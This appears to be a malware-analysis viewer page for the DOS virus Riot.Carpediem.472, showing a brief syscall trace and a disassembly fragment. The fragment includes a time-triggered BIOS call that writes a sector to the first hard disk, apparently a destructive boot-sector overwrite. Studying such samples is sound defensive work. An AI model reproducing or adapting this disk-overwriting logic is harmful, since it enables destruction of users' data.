Sample viewer

vx.netlux.org/Virus.DOS.Riot.Carpediem.472

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:50:54.215675577Z 26 PC: 12a93 | Set disk transfer address
2018-12-17T22:50:54.218007047Z 25 PC: 12aa7 | Get default drive
2018-12-17T22:50:54.220268386Z 44 PC: 12b85 | Get time 0x12b85: cmp dl, 5
0x12b88: ja 0x12ba1
0x12b8a: mov ax, 0x301
0x12b8d: mov cx, 1
0x12b90: mov dx, 0x80
0x12b93: lea bx, word ptr [bp + 0x100]
0x12b97: int 0x13
0x12b99: mov ah, 9
0x12b9b: lea dx, word ptr [bp + 0x287]
0x12b9f: int 0x21
0x12ba1: lea si, word ptr [bp + 0x2d0]
0x12ba5: mov di, 0x100
0x12ba8: movsw word ptr es:[di], word ptr [si]
0x12ba9: movsw word ptr es:[di], word ptr [si]
0x12baa: lea dx, word ptr [bp + 0x304]
0x12bae: mov ah, 0x3b
0x12bb0: int 0x21
0x12bb2: mov bx, 0x100
0x12bb5: push bx
0x12bb6: xor ax, ax
2018-12-17T22:50:54.223923943Z 59 PC: 12bb2 | Change current directory